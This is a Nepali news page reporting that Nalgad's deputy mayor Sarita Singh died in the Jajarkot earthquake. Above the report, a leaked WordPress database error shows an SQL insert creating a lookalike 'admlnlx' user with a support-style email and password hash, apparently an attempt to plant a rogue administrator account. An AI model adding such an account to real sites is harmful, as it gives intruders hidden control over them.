WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEWRkNkhl1adsHA1Jr2p8Ou5GK.WG00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 08:01:53', '', 'admlnlx', 'admlnlx')

भूकम्पमा परि नलगाढ नगरपालिकाकी उपप्रमुख सिंहको मृत्यु – Gaule Khabar

भूकम्पमा परि नलगाढ नगरपालिकाकी उपप्रमुख सिंहको मृत्यु

भूकम्पमा परि नलगाढ नगरपालिकाकी उपप्रमुख सिंहको मृत्यु

जाजरकोट । गयराती गएको भुकम्पले जाजरकोटको नलगाड नगरपालिकाका उपप्रमुख सरिता सिंहको निधन भएको छ।

सदरमुकाम खलंगास्थित माथिल्लो थाप्लेमा सुतिरहेको अवस्थामा घर भत्किँदा उनको मृत्यु भएको जिल्ला प्रहरी प्रमुख डिएसपी किशोर श्रेष्ठले जानकारी दिए ।

उनका अनुसार घटनास्थलबाट उद्धार गरी उपचार गर्न जिल्ला अस्पताल लैजाँदै गर्दा बाटोमै सिंहको मृत्यु भएको हो ।

नलगाड नगरपालिका-८ मैदेकी सिंह स्थानीय तह २०७९ को निर्वाचनमा नेपाली कांग्रेसबाट उपमेयरमा निर्वाचित भएकी थिइन्।

पश्चिम नेपालमा शुक्रबार राति आएको ६.४ म्याग्निच्युडको भुइँचालोले अहिलेसम्म कम्तिमा ३६ जनाको निधन भएको छ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका